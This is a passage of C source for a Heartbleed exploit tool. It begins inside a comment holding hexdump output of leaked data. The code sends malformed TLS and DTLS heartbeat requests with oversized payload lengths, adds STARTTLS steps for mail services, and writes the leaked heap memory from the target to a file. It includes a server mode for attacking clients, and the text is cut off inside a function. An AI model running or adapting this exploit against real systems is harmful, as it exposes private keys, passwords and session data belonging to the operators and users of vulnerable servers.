95 11 a7 a1 64 1d fc 08 8d 87 |[email\u00a0protected]|\r\n* 000002c0 18 d3 5d c6 a0 bb 84 4a 50 f5 27 1c 15 4b 02 0c |..]....JP.'..K..|\r\n* 000002d0 49 1f 2d 0a 52 d3 98 6b 71 3d b9 0f 36 24 d3 77 |I.-.R..kq=..6$.w|\r\n* 000002e0 e0 d0 a5 50 e5 ea 2d 67 11 69 4d 45 52 97 4d 58 |...P..-g.iMER.MX|\r\n* 000002f0 de 22 06 02 6d 21 80 2f 0d 1c d5 d5 80 5c 8f 44 |.\"..m!./.....\\.D|\r\n* 00000300 1e b6 f3 41 4c dc d3 40 8d 54 ac b0 ca 8f 19 6a |[email\u00a0protected]|\r\n* 00000310 4d f2 fb ad 68 5a 99 19 ca ae b2 f5 54 70 29 96 |M...hZ......Tp).|\r\n* 00000320 84 7e ba a9 6b 42 e6 68 32 dc 65 87 b1 b7 17 22 |.~..kB.h2.e....\"|\r\n* 00000330 e3 cc 62 97 e4 fa 64 0b 1e 70 bf e5 a2 40 e4 49 |[email\u00a0protected]|\r\n* 00000340 24 f9 05 3f 2e fe 7c 38 56 39 4d bd 51 63 0d 79 |$..?..|8V9M.Qc.y|\r\n* 00000350 85 c0 4b 1a 46 64 e0 fe a8 87 bf c7 4d 21 cb 79 |..K.Fd......M!.y|\r\n* 00000360 37 e7 a6 e3 6c 3b ed 35 17 73 7a 71 c6 72 2f bb |7...l;.5.szq.r/.|\r\n* 00000370 58 dc ef e9 1e a3 89 5e 70 cd 95 10 87 c1 8a 7e |X......^p......~|\r\n* 00000380 e7 51 c2 22 67 66 ee 22 f9 a5 2e 31 f2 ad fc 3b |.Q.\"gf.\"...1...;|\r\n* 00000390 98 c8 30 63 ef 74 b5 4e c4 bd c7 a2 46 0a b8 bf |..0c.t.N....F...|\r\n* 000003a0 df a8 54 0e 4f 37 d0 a5 27 a3 f3 a7 28 38 3f 16 |..T.O7..'...(8?.|\r\n* 000003b0 fe ff 00 00 00 00 00 00 00 02 00 0c 0e 00 00 00 |................|\r\n* 000003c0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|\r\n* 000003d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|\r\n* *\r\n* 00000530 00 00 00 00 00 00 00 00 82 8f be ff cf 26 12 9d |.............&..|\r\n* 00000540 a2 de 0c 44 21 4a 54 be 41 4c df |...D!JT.AL.|\r\n* 0000054b\r\n*\r\n*/\r\n#include <stdio.h>\r\n#include <stdint.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include <getopt.h>\r\n#include <signal.h>\r\n#include <netdb.h>\r\n#include <fcntl.h>\r\n#include <errno.h>\r\n#include <sys/socket.h>\r\n#include <sys/types.h>\r\n#include 
<netinet/in.h>\r\n#include <inttypes.h>\r\n#include <openssl/bio.h>\r\n#include <openssl/ssl.h>\r\n#include <openssl/err.h>\r\n#include <openssl/evp.h>\r\n#include <openssl/tls1.h>\r\n#include <openssl/rand.h>\r\n#include <openssl/buffer.h>\r\n \r\n#define n2s(c,s)((s=(((unsigned int)(c[0]))<< 8)| \\\r\n (((unsigned int)(c[1])) )),c+=2)\r\n#define s2n(s,c) ((c[0]=(unsigned char)(((s)>> 8)&0xff), \\\r\n c[1]=(unsigned char)(((s) )&0xff)),c+=2)\r\n \r\nint first = 0;\r\nint leakbytes = 0;\r\nint repeat = 1;\r\nint badpackets = 0;\r\n \r\ntypedef struct {\r\n int socket;\r\n SSL *sslHandle;\r\n SSL_CTX *sslContext;\r\n} connection;\r\n \r\ntypedef struct {\r\n unsigned char type;\r\n short version;\r\n unsigned int length;\r\n unsigned char hbtype;\r\n unsigned int payload_length;\r\n void* payload;\r\n} heartbeat;\r\n \r\nvoid ssl_init();\r\nvoid usage();\r\nint tcp_connect(char*,int);\r\nint tcp_bind(char*, int);\r\nconnection* tls_connect(int);\r\nconnection* tls_bind(int);\r\nint pre_cmd(int,int,int);\r\nvoid* heartbleed(connection* ,unsigned int);\r\nvoid* sneakyleaky(connection* ,char*, int);\r\n \r\nstatic DTLS1_BITMAP *dtls1_get_bitmap(SSL *s, SSL3_RECORD *rr, unsigned int *is_next_epoch);\r\nstatic int dtls1_record_replay_check(SSL *s, DTLS1_BITMAP *bitmap);\r\nstatic int dtls1_buffer_record(SSL *s, record_pqueue *q, unsigned char *priority);\r\nstatic void dtls1_record_bitmap_update(SSL *s, DTLS1_BITMAP *bitmap);\r\n \r\nint tcp_connect(char* server,int port){\r\n int sd,ret;\r\n struct hostent *host;\r\n struct sockaddr_in sa;\r\n host = gethostbyname(server);\r\n sd = socket(AF_INET, SOCK_STREAM, 0);\r\n if(sd==-1){\r\n printf(\"[!] 
cannot create socket\\n\");\r\n exit(0);\r\n }\r\n sa.sin_family = AF_INET;\r\n sa.sin_port = htons(port);\r\n sa.sin_addr = *((struct in_addr *) host->h_addr);\r\n bzero(&(sa.sin_zero),8);\r\n printf(\"[ connecting to %s %d/tcp\\n\",server,port);\r\n ret = connect(sd,(struct sockaddr *)&sa, sizeof(struct sockaddr));\r\n if(ret==0){\r\n printf(\"[ connected to %s %d/tcp\\n\",server,port);\r\n }\r\n else{\r\n printf(\"[!] FATAL: could not connect to %s %d/tcp\\n\",server,port);\r\n exit(0);\r\n }\r\n return sd;\r\n}\r\n \r\nint tcp_bind(char* server, int port){\r\n int sd, ret, val=1;\r\n struct sockaddr_in sin;\r\n struct hostent *host;\r\n host = gethostbyname(server);\r\n sd=socket(AF_INET,SOCK_STREAM,0);\r\n if(sd==-1){\r\n printf(\"[!] cannot create socket\\n\");\r\n exit(0);\r\n }\r\n memset(&sin,0,sizeof(sin));\r\n sin.sin_addr=*((struct in_addr *) host->h_addr);\r\n sin.sin_family=AF_INET;\r\n sin.sin_port=htons(port);\r\n setsockopt(sd,SOL_SOCKET,SO_REUSEADDR,&val,sizeof(val));\r\n ret = bind(sd,(struct sockaddr *)&sin,sizeof(sin));\r\n if(ret==-1){\r\n printf(\"[!] cannot bind socket\\n\");\r\n exit(0);\r\n }\r\n listen(sd,5);\r\n return(sd);\r\n}\r\n \r\nconnection* dtls_server(int sd, char* server,int port){\r\n int bytes;\r\n connection *c;\r\n char* buf;\r\n buf = malloc(4096);\r\n int ret;\r\n struct hostent *host;\r\n struct sockaddr_in sa;\r\n unsigned long addr;\r\n if ((host = gethostbyname(server)) == NULL) {\r\n perror(\"gethostbyname\");\r\n exit(1);\r\n }\r\n sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);\r\n if(sd==-1){\r\n printf(\"[!] 
cannot create socket\\n\");\r\n exit(0);\r\n }\r\n sa.sin_family = AF_INET;\r\n sa.sin_port = htons(port);\r\n sa.sin_addr = *((struct in_addr *) host->h_addr);\r\n if (bind(sd, (struct sockaddr *) &sa ,sizeof(struct sockaddr_in)) < 0) {\r\n perror(\"bind()\");\r\n exit(1);\r\n }\r\n \r\n BIO *bio;\r\n if(c==NULL){\r\n printf(\"[ error in malloc()\\n\");\r\n exit(0);\r\n }\r\n if(buf==NULL){\r\n printf(\"[ error in malloc()\\n\");\r\n exit(0);\r\n }\r\n memset(buf,0,4096);\r\n c = malloc(sizeof(connection));\r\n if(c==NULL){\r\n printf(\"[ error in malloc()\\n\");\r\n exit(0);\r\n }\r\n c->socket = sd;\r\n c->sslHandle = NULL;\r\n c->sslContext = NULL;\r\n c->sslContext = SSL_CTX_new(DTLSv1_server_method());\r\n SSL_CTX_set_read_ahead (c->sslContext, 1);\r\n if(c->sslContext==NULL)\r\n ERR_print_errors_fp(stderr);\r\n SSL_CTX_SRP_CTX_init(c->sslContext);\r\n SSL_CTX_use_certificate_file(c->sslContext, \"./server.crt\", SSL_FILETYPE_PEM);\r\n SSL_CTX_use_PrivateKey_file(c->sslContext, \"./server.key\", SSL_FILETYPE_PEM); \r\n if(!SSL_CTX_check_private_key(c->sslContext)){\r\n printf(\"[!] 
FATAL: private key does not match the certificate public key\\n\");\r\n exit(0);\r\n }\r\n c->sslHandle = SSL_new(c->sslContext);\r\n if(c->sslHandle==NULL)\r\n ERR_print_errors_fp(stderr);\r\n if(!SSL_set_fd(c->sslHandle,c->socket))\r\n ERR_print_errors_fp(stderr);\r\n bio = BIO_new_dgram(sd, BIO_NOCLOSE);\r\n \r\n SSL_set_bio(c->sslHandle, bio, bio);\r\n SSL_set_accept_state (c->sslHandle);\r\n \r\n int rc = SSL_accept(c->sslHandle);\r\n printf (\"[ SSL connection using %s\\n\", SSL_get_cipher (c->sslHandle));\r\n// bytes = SSL_read(c->sslHandle, buf, 4095);\r\n// printf(\"[ recieved: %d bytes - showing output\\n%s\\n[\\n\",bytes,buf);\r\n if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||\r\n c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){\r\n printf(\"[ warning: heartbeat extension is unsupported (try anyway)\\n\");\r\n }\r\n return c;\r\n}\r\n \r\nvoid ssl_init(){\r\n SSL_load_error_strings();\r\n SSL_library_init();\r\n OpenSSL_add_all_digests();\r\n OpenSSL_add_all_algorithms();\r\n OpenSSL_add_all_ciphers();\r\n}\r\n \r\nconnection* tls_connect(int sd){\r\n connection *c;\r\n c = malloc(sizeof(connection));\r\n if(c==NULL){\r\n printf(\"[ error in malloc()\\n\");\r\n exit(0);\r\n }\r\n c->socket = sd;\r\n c->sslHandle = NULL;\r\n c->sslContext = NULL;\r\n c->sslContext = SSL_CTX_new(SSLv23_client_method());\r\n SSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3);\r\n if(c->sslContext==NULL)\r\n ERR_print_errors_fp(stderr);\r\n c->sslHandle = SSL_new(c->sslContext);\r\n if(c->sslHandle==NULL)\r\n ERR_print_errors_fp(stderr);\r\n if(!SSL_set_fd(c->sslHandle,c->socket))\r\n ERR_print_errors_fp(stderr);\r\n if(SSL_connect(c->sslHandle)!=1)\r\n ERR_print_errors_fp(stderr);\r\n if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||\r\n c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){\r\n printf(\"[ warning: heartbeat extension is unsupported (try anyway)\\n\");\r\n }\r\n 
return c;\r\n}\r\n \r\nconnection* dtls_client(int sd, char* server,int port){\r\n int ret;\r\n struct hostent *host;\r\n struct sockaddr_in sa;\r\n connection *c;\r\n memset((char *)&sa,0,sizeof(sa));\r\n c = malloc(sizeof(connection));\r\n if ((host = gethostbyname(server)) == NULL) {\r\n perror(\"gethostbyname\");\r\n exit(1);\r\n }\r\n sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);\r\n if(sd==-1){\r\n printf(\"[!] cannot create socket\\n\");\r\n exit(0);\r\n }\r\n sa.sin_family = AF_INET;\r\n sa.sin_port = htons(port);\r\n sa.sin_addr = *((struct in_addr *) host->h_addr);\r\n if (connect(sd, (struct sockaddr *) &sa ,sizeof(struct sockaddr_in)) < 0) {\r\n perror(\"connect()\");\r\n exit(0);\r\n }\r\n \r\n BIO *bio;\r\n if(c==NULL){\r\n printf(\"[ error in malloc()\\n\");\r\n exit(0);\r\n }\r\n \r\n c->sslContext = NULL;\r\n c->sslContext = SSL_CTX_new(DTLSv1_client_method());\r\n SSL_CTX_set_read_ahead (c->sslContext, 1);\r\n if(c->sslContext==NULL)\r\n ERR_print_errors_fp(stderr);\r\n if(c->sslHandle==NULL)\r\n ERR_print_errors_fp(stderr);\r\n \r\n c->socket = sd;\r\n c->sslHandle = NULL;\r\n c->sslHandle = SSL_new(c->sslContext);\r\n SSL_set_tlsext_host_name(c->sslHandle,server);\r\n bio = BIO_new_dgram(sd, BIO_NOCLOSE);\r\n \r\n BIO_ctrl_set_connected(bio, 1, &sa);\r\n SSL_set_bio(c->sslHandle, bio, bio);\r\n SSL_set_connect_state (c->sslHandle);\r\n//printf(\"eshta\\n\");\r\n if(SSL_connect(c->sslHandle)!=1)\r\n ERR_print_errors_fp(stderr);\r\n \r\n if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||\r\n c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){\r\n printf(\"[ warning: heartbeat extension is unsupported (try anyway), %d \\n\",c->sslHandle->tlsext_heartbeat);\r\n }\r\n return c;\r\n}\r\n \r\nconnection* tls_bind(int sd){\r\n int bytes;\r\n connection *c;\r\n char* buf;\r\n buf = malloc(4096);\r\n if(buf==NULL){\r\n printf(\"[ error in malloc()\\n\");\r\n exit(0);\r\n }\r\n memset(buf,0,4096);\r\n c = 
malloc(sizeof(connection));\r\n if(c==NULL){\r\n printf(\"[ error in malloc()\\n\");\r\n exit(0);\r\n }\r\n c->socket = sd;\r\n c->sslHandle = NULL;\r\n c->sslContext = NULL;\r\n c->sslContext = SSL_CTX_new(SSLv23_server_method());\r\n if(c->sslContext==NULL)\r\n ERR_print_errors_fp(stderr);\r\n SSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3);\r\n SSL_CTX_SRP_CTX_init(c->sslContext);\r\n SSL_CTX_use_certificate_file(c->sslContext, \"./server.crt\", SSL_FILETYPE_PEM);\r\n SSL_CTX_use_PrivateKey_file(c->sslContext, \"./server.key\", SSL_FILETYPE_PEM); \r\n if(!SSL_CTX_check_private_key(c->sslContext)){\r\n printf(\"[!] FATAL: private key does not match the certificate public key\\n\");\r\n exit(0);\r\n }\r\n c->sslHandle = SSL_new(c->sslContext);\r\n if(c->sslHandle==NULL)\r\n ERR_print_errors_fp(stderr);\r\n if(!SSL_set_fd(c->sslHandle,c->socket))\r\n ERR_print_errors_fp(stderr);\r\n int rc = SSL_accept(c->sslHandle);\r\n printf (\"[ SSL connection using %s\\n\", SSL_get_cipher (c->sslHandle));\r\n bytes = SSL_read(c->sslHandle, buf, 4095);\r\n printf(\"[ recieved: %d bytes - showing output\\n%s\\n[\\n\",bytes,buf);\r\n if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||\r\n c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){\r\n printf(\"[ warning: heartbeat extension is unsupported (try anyway)\\n\");\r\n }\r\n return c;\r\n}\r\n \r\nint pre_cmd(int sd,int precmd,int verbose){\r\n /* this function can be used to send commands to a plain-text\r\n service or client before heartbleed exploit attempt. e.g. 
STARTTLS */\r\n int rc, go = 0;\r\n char* buffer;\r\n char* line1;\r\n char* line2; \r\n switch(precmd){\r\n case 0:\r\n line1 = \"EHLO test\\n\";\r\n line2 = \"STARTTLS\\n\";\r\n break;\r\n case 1:\r\n line1 = \"CAPA\\n\";\r\n line2 = \"STLS\\n\";\r\n break;\r\n case 2:\r\n line1 = \"a001 CAPB\\n\";\r\n line2 = \"a002 STARTTLS\\n\";\r\n break;\r\n default:\r\n go = 1;\r\n break;\r\n }\r\n if(go==0){\r\n buffer = malloc(2049);\r\n if(buffer==NULL){\r\n printf(\"[ error in malloc()\\n\");\r\n exit(0);\r\n }\r\n memset(buffer,0,2049);\r\n rc = read(sd,buffer,2048);\r\n printf(\"[ banner: %s\",buffer);\r\n send(sd,line1,strlen(line1),0);\r\n memset(buffer,0,2049);\r\n rc = read(sd,buffer,2048);\r\n if(verbose==1){\r\n printf(\"%s\\n\",buffer);\r\n }\r\n send(sd,line2,strlen(line2),0);\r\n memset(buffer,0,2049);\r\n rc = read(sd,buffer,2048);\r\n if(verbose==1){\r\n printf(\"%s\\n\",buffer);\r\n }\r\n }\r\n return sd;\r\n}\r\n \r\nvoid* heartbleed(connection *c,unsigned int type){\r\n unsigned char *buf, *p;\r\n int ret;\r\n buf = OPENSSL_malloc(1 + 2);\r\n if(buf==NULL){\r\n printf(\"[ error in malloc()\\n\");\r\n exit(0);\r\n }\r\n p = buf;\r\n *p++ = TLS1_HB_REQUEST;\r\n switch(type){\r\n case 0:\r\n s2n(0x0,p);\r\n break;\r\n case 1:\r\n s2n(0xffff,p);\r\n break;\r\n default:\r\n printf(\"[ setting heartbeat payload_length to %u\\n\",type);\r\n s2n(type,p);\r\n break;\r\n }\r\n printf(\"[ <3 <3 <3 heart bleed <3 <3 <3\\n\");\r\n ret = ssl3_write_bytes(c->sslHandle, TLS1_RT_HEARTBEAT, buf, 3);\r\n OPENSSL_free(buf);\r\n return c;\r\n}\r\n \r\nvoid* dtlsheartbleed(connection *c,unsigned int type){\r\n \r\n unsigned char *buf, *p;\r\n int ret;\r\n buf = OPENSSL_malloc(1 + 2 + 16);\r\n memset(buf, '\\0', sizeof buf);\r\n if(buf==NULL){\r\n printf(\"[ error in malloc()\\n\");\r\n exit(0);\r\n }\r\n p = buf;\r\n *p++ = TLS1_HB_REQUEST;\r\n switch(type){\r\n case 0:\r\n s2n(0x0,p);\r\n break;\r\n case 1:\r\n// s2n(0xffff,p);\r\n// s2n(0x3feb,p);\r\n s2n(0x0538,p);\r\n 
break;\r\n default:\r\n printf(\"[ setting heartbeat payload_length to %u\\n\",type);\r\n s2n(type,p);\r\n break;\r\n }\r\n s2n(c->sslHandle->tlsext_hb_seq, p);\r\n printf(\"[ <3 <3 <3 heart bleed <3 <3 <3\\n\");\r\n \r\n ret = dtls1_write_bytes(c->sslHandle, TLS1_RT_HEARTBEAT, buf, 3 + 16);\r\n \r\n if (ret >= 0)\r\n {\r\n if (c->sslHandle->msg_callback)\r\n c->sslHandle->msg_callback(1, c->sslHandle->version, TLS1_RT_HEARTBEAT,\r\n buf, 3 + 16,\r\n c->sslHandle, c->sslHandle->msg_callback_arg);\r\n \r\n dtls1_start_timer(c->sslHandle);\r\n c->sslHandle->tlsext_hb_pending = 1;\r\n }\r\n \r\n OPENSSL_free(buf);\r\n \r\n return c;\r\n}\r\n \r\nvoid* sneakyleaky(connection *c,char* filename, int verbose){\r\n char *p;\r\n int ssl_major,ssl_minor,al;\r\n int enc_err,n,i;\r\n SSL3_RECORD *rr;\r\n SSL_SESSION *sess;\r\n SSL* s;\r\n unsigned char md[EVP_MAX_MD_SIZE];\r\n short version;\r\n unsigned mac_size, orig_len;\r\n size_t extra;\r\n rr= &(c->sslHandle->s3->rrec);\r\n sess=c->sslHandle->session;\r\n s = c->sslHandle;\r\n if (c->sslHandle->options & SSL_OP_MICROSOFT_BIG_SSLV3_BUFFER)\r\n extra=SSL3_RT_MAX_EXTRA;\r\n else\r\n extra=0;\r\n if ((s->rstate != SSL_ST_READ_BODY) ||\r\n (s->packet_length < SSL3_RT_HEADER_LENGTH)) {\r\n n=ssl3_read_n(s, SSL3_RT_HEADER_LENGTH, s->s3->rbuf.len, 0);\r\n if (n <= 0)\r\n goto apple;\r\n s->rstate=SSL_ST_READ_BODY;\r\n p=s->packet;\r\n rr->type= *(p++);\r\n ssl_major= *(p++);\r\n ssl_minor= *(p++);\r\n version=(ssl_major<<8)|ssl_minor;\r\n n2s(p,rr->length);\r\n if(rr->type==24){\r\n printf(\"[ heartbeat returned type=%d length=%u\\n\",rr->type, rr->length);\r\n if(rr->length > 16834){\r\n printf(\"[ error: got a malformed TLS length.\\n\");\r\n exit(0);\r\n }\r\n }\r\n else{\r\n printf(\"[ incorrect record type=%d length=%u returned\\n\",rr->type,rr->length);\r\n s->packet_length=0;\r\n badpackets++;\r\n if(badpackets > 3){\r\n printf(\"[ error: too many bad packets recieved\\n\");\r\n exit(0);\r\n }\r\n goto apple;\r\n }\r\n 
}\r\n if (rr->length > s->packet_length-SSL3_RT_HEADER_LENGTH){\r\n i=rr->length;\r\n n=ssl3_read_n(s,i,i,1);\r\n if (n <= 0) goto apple;\r\n }\r\n printf(\"[ decrypting SSL packet\\n\");\r\n s->rstate=SSL_ST_READ_HEADER;\r\n rr->input= &(s->packet[SSL3_RT_HEADER_LENGTH]);\r\n rr->data=rr->input;\r\n tls1_enc(s,0);\r\n if((sess != NULL) &&\r\n (s->enc_read_ctx != NULL) &&\r\n (EVP_MD_CTX_md(s->read_hash) != NULL))\r\n {\r\n unsigned char *mac = NULL;\r\n unsigned char mac_tmp[EVP_MAX_MD_SIZE];\r\n mac_size=EVP_MD_CTX_size(s->read_hash);\r\n OPENSSL_assert(mac_size <= EVP_MAX_MD_SIZE);\r\n orig_len = rr->length+((unsigned int)rr->type>>8);\r\n if(orig_len < mac_size ||\r\n (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE &&\r\n orig_len < mac_size+1)){\r\n al=SSL_AD_DECODE_ERROR;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_LENGTH_TOO_SHORT);\r\n }\r\n if (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE){\r\n mac = mac_tmp;\r\n ssl3_cbc_copy_mac(mac_tmp, rr, mac_size, orig_len);\r\n rr->length -= mac_size;\r\n }\r\n else{\r\n rr->length -= mac_size;\r\n mac = &rr->data[rr->length];\r\n }\r\n i = tls1_mac(s,md,0);\r\n if (i < 0 || mac == NULL || CRYPTO_memcmp(md, mac, (size_t)mac_size) != 0)\r\n enc_err = -1;\r\n if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+extra+mac_size)\r\n enc_err = -1;\r\n }\r\n if(enc_err < 0){\r\n al=SSL_AD_BAD_RECORD_MAC;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DECRYPTION_FAILED_OR_BAD_RECORD_MAC);\r\n goto apple;\r\n }\r\n if(s->expand != NULL){\r\n if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+extra) {\r\n al=SSL_AD_RECORD_OVERFLOW;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_COMPRESSED_LENGTH_TOO_LONG);\r\n goto apple;\r\n }\r\n if (!ssl3_do_uncompress(s)) {\r\n al=SSL_AD_DECOMPRESSION_FAILURE;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_BAD_DECOMPRESSION);\r\n goto apple;\r\n }\r\n }\r\n if (rr->length > SSL3_RT_MAX_PLAIN_LENGTH+extra) {\r\n al=SSL_AD_RECORD_OVERFLOW;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DATA_LENGTH_TOO_LONG);\r\n 
goto apple;\r\n }\r\n rr->off=0;\r\n s->packet_length=0;\r\n if(first==0){\r\n uint heartbleed_len = 0;\r\n char* fp = s->s3->rrec.data;\r\n (long)fp++;\r\n memcpy(&heartbleed_len,fp,2);\r\n heartbleed_len = (heartbleed_len & 0xff) << 8 | (heartbleed_len & 0xff00) >> 8;\r\n first = 2;\r\n leakbytes = heartbleed_len + 16;\r\n printf(\"[ heartbleed leaked length=%u\\n\",heartbleed_len);\r\n }\r\n if(verbose==1){\r\n { unsigned int z; for (z=0; z<rr->length; z++) printf(\"%02X%c\",rr->data[z],((z+1)%16)?' ':'\\n'); }\r\n printf(\"\\n\");\r\n }\r\n leakbytes-=rr->length;\r\n if(leakbytes > 0){\r\n repeat = 1;\r\n }\r\n else{\r\n repeat = 0;\r\n }\r\n printf(\"[ final record type=%d, length=%u\\n\", rr->type, rr->length);\r\n int output = s->s3->rrec.length-3;\r\n if(output > 0){\r\n int fd = open(filename,O_RDWR|O_CREAT|O_APPEND,0700);\r\n if(first==2){\r\n first--;\r\n write(fd,s->s3->rrec.data+3,s->s3->rrec.length);\r\n /* first three bytes are resp+len */\r\n printf(\"[ wrote %d bytes of heap to file '%s'\\n\",s->s3->rrec.length-3,filename);\r\n }\r\n else{\r\n /* heap data & 16 bytes padding */\r\n write(fd,s->s3->rrec.data+3,s->s3->rrec.length);\r\n printf(\"[ wrote %d bytes of heap to file '%s'\\n\",s->s3->rrec.length,filename);\r\n }\r\n close(fd);\r\n }\r\n else{\r\n printf(\"[ nothing from the heap to write\\n\");\r\n }\r\n return;\r\napple:\r\n printf(\"[ problem handling SSL record packet - wrong type?\\n\");\r\n badpackets++;\r\n if(badpackets > 3){\r\n printf(\"[ error: too many bad packets recieved\\n\");\r\n exit(0);\r\n }\r\n return;\r\n}\r\n \r\n \r\nvoid* dtlssneakyleaky(connection *c,char* filename, int verbose){\r\n char *p;\r\n int ssl_major,ssl_minor,al;\r\n int enc_err,n,i;\r\n SSL3_RECORD *rr;\r\n SSL_SESSION *sess;\r\n SSL* s;\r\n DTLS1_BITMAP *bitmap;\r\n unsigned int is_next_epoch;\r\n unsigned char md[EVP_MAX_MD_SIZE];\r\n short version;\r\n unsigned int mac_size, orig_len;\r\n \r\n rr= &(c->sslHandle->s3->rrec);\r\n 
sess=c->sslHandle->session;\r\n s = c->sslHandle;\r\n \r\nagain:\r\n if ((s->rstate != SSL_ST_READ_BODY) ||\r\n (s->packet_length < DTLS1_RT_HEADER_LENGTH)) {\r\n n=ssl3_read_n(s, DTLS1_RT_HEADER_LENGTH, s->s3->rbuf.len, 0);\r\n if (n <= 0)\r\n goto apple;\r\n \r\n s->rstate=SSL_ST_READ_BODY;\r\n p=s->packet;\r\n rr->type= *(p++);\r\n ssl_major= *(p++);\r\n ssl_minor= *(p++);\r\n version=(ssl_major<<8)|ssl_minor;\r\n n2s(p,rr->epoch);\r\n memcpy(&(s->s3->read_sequence[2]), p, 6);\r\n p+=6;\r\n n2s(p,rr->length);\r\n if(rr->type==24){\r\n printf(\"[ heartbeat returned type=%d length=%u\\n\",rr->type, rr->length);\r\n if(rr->length > 16834){\r\n printf(\"[ error: got a malformed TLS length.\\n\");\r\n exit(0);\r\n }\r\n }\r\n else{\r\n printf(\"[ incorrect record type=%d length=%u returned\\n\",rr->type,rr->length);\r\n s->packet_length=0;\r\n badpackets++;\r\n if(badpackets > 3){\r\n printf(\"[ error: too many bad packets recieved\\n\");\r\n exit(0);\r\n }\r\n goto apple;\r\n }\r\n }\r\n \r\n if (rr->length > s->packet_length-DTLS1_RT_HEADER_LENGTH){\r\n i=rr->length;\r\n n=ssl3_read_n(s,i,i,1);\r\n if (n <= 0) goto apple;\r\n }\r\n if ( n != i)\r\n {\r\n rr->length = 0;\r\n s->packet_length = 0;\r\n goto again;\r\n }\r\n printf(\"[ decrypting SSL packet\\n\");\r\n s->rstate=SSL_ST_READ_HEADER;\r\n \r\n bitmap = dtls1_get_bitmap(s, rr, &is_next_epoch);\r\n if ( bitmap == NULL)\r\n {\r\n rr->length = 0;\r\n s->packet_length = 0;\r\n goto again;\r\n }\r\n \r\n if (!(s->d1->listen && rr->type == SSL3_RT_HANDSHAKE &&\r\n *p == SSL3_MT_CLIENT_HELLO) &&\r\n !dtls1_record_replay_check(s, bitmap))\r\n {\r\n rr->length = 0;\r\n s->packet_length=0;\r\n goto again;\r\n }\r\n \r\n if (rr->length == 0) goto again;\r\nif (is_next_epoch)\r\n {\r\n if ((SSL_in_init(s) || s->in_handshake) && !s->d1->listen)\r\n {\r\n dtls1_buffer_record(s, &(s->d1->unprocessed_rcds), rr->seq_num);\r\n }\r\n rr->length = 0;\r\n s->packet_length = 0;\r\n goto again;\r\n }\r\n \r\n \r\n rr->input= 
&(s->packet[DTLS1_RT_HEADER_LENGTH]);\r\n rr->data=rr->input;\r\n orig_len=rr->length;\r\n \r\n dtls1_enc(s,0);\r\n \r\n if((sess != NULL) &&\r\n (s->enc_read_ctx != NULL) &&\r\n (EVP_MD_CTX_md(s->read_hash) != NULL))\r\n {\r\n unsigned char *mac = NULL;\r\n unsigned char mac_tmp[EVP_MAX_MD_SIZE];\r\n mac_size=EVP_MD_CTX_size(s->read_hash);\r\n OPENSSL_assert(mac_size <= EVP_MAX_MD_SIZE);\r\n orig_len = rr->length+((unsigned int)rr->type>>8);\r\n if(orig_len < mac_size ||\r\n (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE &&\r\n orig_len < mac_size+1)){\r\n al=SSL_AD_DECODE_ERROR;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_LENGTH_TOO_SHORT);\r\n }\r\n if (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE){\r\n mac = mac_tmp;\r\n ssl3_cbc_copy_mac(mac_tmp, rr, mac_size, orig_len);\r\n rr->length -= mac_size;\r\n }\r\n else{\r\n rr->length -= mac_size;\r\n mac = &rr->data[rr->length];\r\n }\r\n i = tls1_mac(s,md,0);\r\n \r\n if (i < 0 || mac == NULL || CRYPTO_memcmp(md, mac, (size_t)mac_size) != 0)\r\n enc_err = -1;\r\n \r\n if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+mac_size)\r\n enc_err = -1;\r\n }\r\n if(enc_err < 0){\r\n al=SSL_AD_BAD_RECORD_MAC;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DECRYPTION_FAILED_OR_BAD_RECORD_MAC);\r\n goto apple;\r\n }\r\n if(s->expand != NULL){\r\n if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH) {\r\n al=SSL_AD_RECORD_OVERFLOW;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_COMPRESSED_LENGTH_TOO_LONG);\r\n goto apple;\r\n }\r\n if (!ssl3_do_uncompress(s)) {\r\n al=SSL_AD_DECOMPRESSION_FAILURE;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_BAD_DECOMPRESSION);\r\n goto apple;\r\n }\r\n }\r\n \r\n if (rr->length > SSL3_RT_MAX_PLAIN_LENGTH) {\r\n al=SSL_AD_RECORD_OVERFLOW;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DATA_LENGTH_TOO_LONG);\r\n goto apple;\r\n 